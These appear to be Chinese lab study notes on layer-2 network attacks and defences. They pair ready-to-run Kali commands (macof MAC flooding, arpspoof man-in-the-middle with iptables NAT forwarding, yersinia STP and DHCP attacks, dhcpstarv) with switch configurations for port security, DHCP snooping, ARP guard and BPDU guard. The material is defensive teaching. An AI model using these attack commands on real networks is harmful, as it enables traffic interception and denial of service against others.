MAC协议安全攻防
kali 攻击 输入 macof -i eth0 -i 选择网卡
防御 使用交换机的安全特性
Port Security
DCRS 需要开启 mac地址表学习使用cpu控制
mac-address-learning cpu-control
在端口上开启
switchport mode access 开启access模式
开启端口安全 (必选)
switchport port-security
进行mac地址绑定 (可省)
switchport port-security mac-address
允许几个人登录 (可省)
switchport port-security maximum 1
保护模式 (默认使用shutdown)
switchport port-security violation
四种
protect 安全违背保护模式
recovery 恢复违背状态
restrict 安全违背限制模式
shutdown 安全违背关闭模式
ARP协议安全攻防
kali 攻击 使用 arpspoof -i 选择网卡
一.向主机B声称自己(攻击者)就是网关
arpspoof -i eth0 -t 192.168.159.132 192.168.159.2
(192.168.159.132是我们的攻击目标、192.168.159.2是网关IP地址)
二、攻击者仅仅欺骗被攻击主机、同时在本地进行Iptable NAT转发(双向)
使用NAT技术,从服务端返回的数据包也会经过攻击者的主机了,这样,攻击者就可以在本地进行流量内容的修改、流量注入了
1. 开启端口转发,允许本机像路由器那样转发数据包
echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP投毒,向主机B声称自己(攻击者)就是网关
arpspoof -i eth0 -t 192.168.159.132 192.168.159.2
(192.168.159.132是我们的攻击目标、192.168.159.2是网关IP地址)
3. 使用Iptables进行NAT数据包转发
iptables -t nat -A POSTROUTING -p tcp -s 192.168.159.0/24 -j SNAT --to-source 192.168.159.254
iptables -t nat -A PREROUTING -p tcp -d 192.168.159.254 -j DNAT --to 192.168.159.132
有关Iptables的原理请参阅另一篇文章:
http://www.cnblogs.com/LittleHann/p/3708222.html
三、攻击者同时欺骗被攻击主机和网关(双向)
在双向ARP欺骗中,攻击者仅仅充当了一个"数据包路由转发"的角色,将两个方向的数据包都进行转发
1. 开启端口转发,允许本机像路由器那样转发数据包
echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP投毒,向主机B声称自己(攻击者)就是网关
arpspoof -i eth0 -t 192.168.159.132 192.168.159.2
(192.168.159.132是我们的攻击目标、192.168.159.2是网关IP地址)
这个指令翻译为中间即为: 告诉"192.168.159.132"这个人,"192.168.159.2"这个IP的MAC就是攻击者本机的MAC地址
3. ARP投毒,向网关G声称自己(攻击者)就是网关
arpspoof -i eth0 -t 192.168.159.2 192.168.159.132
(192.168.159.2是网关IP地址、192.168.159.132是我们的攻击目标)
这个指令翻译为中间即为: 告诉"192.168.159.2"这个人,"192.168.159.132"这个IP的MAC就是攻击者本机的MAC地址
防御
方法1。 启用am
Access Management
Switch(Config)#am enable 开启
Switch(Config)#interface Ethernet 1/0/5 进入e 1/0/5
Switch(Config-Ethernet0/0/4)#am port 设置am port
Switch(Config-Ethernet0/0/4)#am mac-ip-pool 00-01-10-22-33-10 192.1.1.2 静态绑定mac和ip 一一对应起来
端口+ip+mac 绑定 对应的pass 不对应的deny
注:所有端口都需要配置 较麻烦
方法2.启用 ip snooping 功能 监听
全局
ip dhcp snooping enable 开启 ip dhcp snooping 功能
ip dhcp snooping vlan 10;20 监听 vlan 号
ip dhcp snooping binding enable 开启DHCP Snooping绑定
ip dhcp snooping binding arp snooping 绑定arp 功能
端口
ip dhcp snooping binding user-control vlan 10 启动DHCP Snooping绑定user功能 启用vlan 10
ip dhcp snooping blocked record interval default 拒绝转发非法报文 记录时间间隔
方法3.ARP Guard 防止网关欺骗
arp-guard ip
被保护的IP地址。此后从这个端口上接收到源IP地址为<addr>的arp报文就认为报文非法,将被直接丢弃。
方法4.配置免费arp
免费arp 作用
1.确定其它设备的IP地址是否与本机IP地址冲突。
2.设备改变了接口MAC 地址,通过发送免费ARP报文通知其他设备更新ARP表项。
3.可以防止针对网关的ARP欺骗。交换机定时向局域网内主机广播免费ARP,这样局域
网内主机的ARP缓存会定时更新,所以在局域网内主机受到针对网关的ARP欺骗后,主机会在收到交换机的免费ARP后,更新其ARP缓存而得到正确网关MAC地址,这样就防止了针对网关的ARP欺骗。
1. 一次设置两个接口的免费ARP发送功能
Switch(config)#ip gratuitous-arp 300
Switch(config)#exit
2. 一次设计一个接口的免费ARP发送功能
Switch(config)#interface vlan 10
Switch(Config-if-Vlan10)#ip gratuitous-arp 300
Spanning Tree协议安全
攻击
kali
yersinia stp (还有其他协议可以攻击) -i eth0 -attack 3
-attack 有许多默认的攻击方式
0:非DOS攻击的发送配置BPDU
1:非DOS攻击发送拓扑变更BPDU
2:DOS攻击发送配置BPDU
3:DOS攻击发送拓扑变更BPDU
4:非DOS攻击申明根桥的角色
5:非DOS攻击申明其它角色
6:DOS攻击申明根桥角色with MiTM
夺取 Root Bridge 使用-attack 4
防御
1.开启spanning tree
spanning tree
2.设置spanning tree 的模式 stp rstp mstp
spanning tree mode stp/rstp/mstp
3.设置跟桥优先级
spanning-tree priority 0
4.show spanning tree
查看自己的配置是否是根交换机
5.在端口上开启 rootguard 设置端口不能成为根端口
SW(config-if-port-range)#spanning-tree rootguard
6.方法2 设置边缘端口 并 过滤bpdu 或者获取bpdu 关闭端口
SW(config-if-port-range)#spanning-tree portfast bpdufilter/bpduguard
bpdufilter 设置边缘端口过滤BPDU报文
bpduguard 设置边缘端口收到BPDU报文后关闭
dhcp 攻击
kali
yersinia dhcp (还有其他协议可以攻击) -i eth0 -attack 0/1/2/3
在DHCP中实施攻击:
0:非DOS攻击发送RAW包
1:DOS攻击发送DISCOVER包 耗尽dhcp池内的ip地址
2:非DOS攻击创建DHCP流氓服务器 耗尽dhcp池类的地址 自己做dhcp地址池分配ip
3:DOS攻击发送释放包
耗尽dhcp池内的ip地址
使用 yersinia
yersinia dhcp -i eth0 -attack 1
使用dhcpstarv
dhcpstarv -i eth0 -e 192.168.177.128
防御 防止dhcp地址池ip耗尽
开启ip dhcp snooping enable
ip dhcp snooping vlan 设置监听的vlan
*可选
*记录非法信息功能 ip dhcp snooping blocked record enable
*端口开启记录 ip dhcp snooping blocked record interval default
*就可以 show ip dh snooping blocked all 看见非法报文
dhcp 每秒收包数
ip dhcp snooping limit-rate 5
设置trust口 就是连接dhcp服务器的端口
如果使用了交换机dhcp 功能 就选择一个在vlan里的端口 设置为trust口 或者起一个lo口 来设置dhcp trust口
默认交换机其他端口都为untrust 每秒收包数达到我们设置的包后 就会shutdown
抑制DHCP广播报文
ip dhcp broadcast suppress
防御 ip dhcp 服务器伪造
开启dhcp广播抑制 并把dhcp报文发给trust端口
ip dhcp snooping broadcast suppress
设置DHCP Snooping检测到伪装Server报文时的自定义动作
DCRS-5650(config-if-port-range)#ip dhcp snooping action shutdown
dos攻击与防御